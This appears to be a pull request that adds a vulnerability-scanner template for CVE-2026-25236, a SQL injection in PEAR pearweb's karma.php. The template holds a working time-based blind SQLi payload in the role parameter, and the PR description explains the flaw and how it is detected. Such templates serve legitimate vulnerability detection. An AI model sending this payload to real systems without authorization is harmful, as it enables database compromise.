### PR TITLE
Add CVE-2026-25236 - PEAR pearweb SQLi in Karma Queries

### DIFF
--- a/http/cves/2026/CVE-2026-25236.yaml
+++ b/http/cves/2026/CVE-2026-25236.yaml
@@ -1,0 +1,44 @@
+id: CVE-2026-25236
+
+info:
+  name: PEAR pearweb < 1.33.0 - SQL Injection in Karma Queries
+  author: bswearingen
+  severity: critical
+  description: |
+    PEAR is a framework and distribution system for reusable PHP components. Prior to version 1.33.0, a SQL injection risk exists in karma queries due to unsafe literal substitution for an IN (...) list. This issue has been patched in version 1.33.0.
+  impact: |
+    An attacker who can influence karma query parameters can inject arbitrary SQL, potentially compromising the database.
+  remediation: |
+    Upgrade PEAR pearweb to version 1.33.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25236
+    - https://github.com/pear/pearweb
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-25236
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    vendor: pear
+    product: pearweb
+  tags: cve,cve2026,pear,pearweb,sqli
+
+http:
+  - raw:
+      - |
+        GET /karma.php?role=1%27)%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(6)))a)--%20- HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+
+      - type: status
+        status:
+          - 200
+          - 302
+          - 500
+        condition: or


### PR DESCRIPTION
### Template Overview

This template detects CVE-2026-25236, a SQL injection vulnerability in PEAR pearweb's karma query system.

### Vulnerability Details

**Product:** PEAR pearweb
**Affected Versions:** < 1.33.0
**Severity:** Critical (CVSS 9.8)
**CWE:** CWE-89 (SQL Injection)

The karma query functionality uses unsafe literal string substitution when constructing an `IN (...)` clause for role filters. Because user-supplied role values are interpolated directly into the SQL statement without parameterization or escaping, an attacker can break out of the intended query structure and inject arbitrary SQL.

### Detection Method

Time-based blind SQL injection via the karma endpoint. The template injects a `SLEEP(6)` payload through the role parameter and measures the response delay.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2026-25236
- https://github.com/pear/pearweb